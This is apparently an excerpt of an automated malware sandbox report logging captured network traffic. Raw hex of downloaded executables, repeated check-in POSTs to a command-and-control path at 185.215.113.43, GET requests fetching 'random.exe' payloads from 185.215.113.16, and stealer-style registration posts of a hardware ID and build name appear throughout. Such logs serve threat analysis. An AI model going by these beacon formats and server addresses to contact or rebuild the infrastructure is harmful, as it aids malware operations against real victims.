42 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 64 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 0e 00 00 04 00 00 0d 9f 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 4c a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 4c a8 00 00 00 40 0d 00 00 aa 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 f0 0d 00 00 76 00 00 00 9e 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 23 Nov 2024 20:15:38 GMTContent-Type: application/octet-streamContent-Length: 2817536Last-Modified: Sat, 23 Nov 2024 19:40:12 GMTConnection: keep-aliveETag: "67422f9c-2afe00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 db 7d 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 72 71 79 69 78 73 77 62 00 a0 2a 00 00 a0 00 00 00 9e 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 6f 76 6b 6b 71 67 6b 00 20 00 00 00 40 2b 00 00 04 00 00 00 d8 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2b 00 00 22 00 00 00 dc 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 23 Nov 2024 20:15:42 GMTContent-Type: application/octet-streamContent-Length: 2817536Last-Modified: Sat, 23 Nov 2024 19:40:14 GMTConnection: keep-aliveETag: "67422f9e-2afe00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 db 7d 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 72 71 79 69 78 73 77 62 00 a0 2a 00 00 a0 00 00 00 9e 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 6f 76 6b 6b 71 67 6b 00 20 00 00 00 40 2b 00 00 04 00 00 00 d8 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2b 00 00 22 00 00 00 dc 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 23 Nov 2024 20:16:02 GMTContent-Type: application/octet-streamContent-Length: 2817536Last-Modified: Sat, 23 Nov 2024 19:40:14 GMTConnection: keep-aliveETag: "67422f9e-2afe00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 db 7d 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 72 71 79 69 78 73 77 62 00 a0 2a 00 00 a0 00 00 00 9e 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 6f 76 6b 6b 71 67 6b 00 20 00 00 00 40 2b 00 00 04 00 00 00 d8 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2b 00 00 22 00 00 00 dc 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /OneCollector/1.0/ HTTP/1.1Accept: */*APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAEL9f9ZdE6XEOizK7dZeFMazgAKZOBtR2xu8UuLipG5J+I1bazh+Jh9vgRd31ehJ0uPnQkp5jZj30ir19+fPR2mtkbRlbw/4AsnmFKZ7EMqBsRrFiMEtZYu7WMBhyYtdVGlwPnCd0KDwMN8cz5Dz8YhU7dMF0jVIMT3MdEVZbMrVWYr06jOAUxbH6RQZ0jBRnz98tQWd7/Ls8yUE+RIlOu0Bjx58l98+IorthmxRBYKPDiAkmjrm6dTNJpt4jwqEHTUflf2uKDgRAhM+FNQA0ZB+QjhyQSBA9XLEiEi+8/qft2MkNTElbV0nbmChrQHOj+7qjIAE=&p=Client-Id: NO_AUTHContent-Encoding: deflateContent-Type: application/bond-compact-binaryExpect: 100-continueSDK-Version: EVT-Windows-C++-No-3.4.15.1Upload-Time: 1732393162280Host: self.events.data.microsoft.comContent-Length: 7983Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 35 31 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008515001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 35 31 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008516001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKFIDHDGIEGCAKFIIJKFHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 35 43 44 44 42 31 37 39 39 41 43 33 33 34 33 34 31 32 31 34 38 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 2d 2d 0d 0a Data Ascii: ------AKFIDHDGIEGCAKFIIJKFContent-Disposition: form-data; name="hwid"B5CDDB1799AC3343412148------AKFIDHDGIEGCAKFIIJKFContent-Disposition: form-data; name="build"mars------AKFIDHDGIEGCAKFIIJKF--
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 35 31 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008517001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFCAAEBGCAKKFIDBKJJHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 46 43 41 41 45 42 47 43 41 4b 4b 46 49 44 42 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 35 43 44 44 42 31 37 39 39 41 43 33 33 34 33 34 31 32 31 34 38 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 43 41 41 45 42 47 43 41 4b 4b 46 49 44 42 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 43 41 41 45 42 47 43 41 4b 4b 46 49 44 42 4b 4a 4a 2d 2d 0d 0a Data Ascii: ------HCFCAAEBGCAKKFIDBKJJContent-Disposition: form-data; name="hwid"B5CDDB1799AC3343412148------HCFCAAEBGCAKKFIDBKJJContent-Disposition: form-data; name="build"mars------HCFCAAEBGCAKKFIDBKJJ--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 35 31 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008518001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECFCBFBGDBKJKECAAKKFHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 35 43 44 44 42 31 37 39 39 41 43 33 33 34 33 34 31 32 31 34 38 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 2d 2d 0d 0a Data Ascii: ------ECFCBFBGDBKJKECAAKKFContent-Disposition: form-data; name="hwid"B5CDDB1799AC3343412148------ECFCBFBGDBKJKECAAKKFContent-Disposition: form-data; name="build"mars------ECFCBFBGDBKJKECAAKKF--
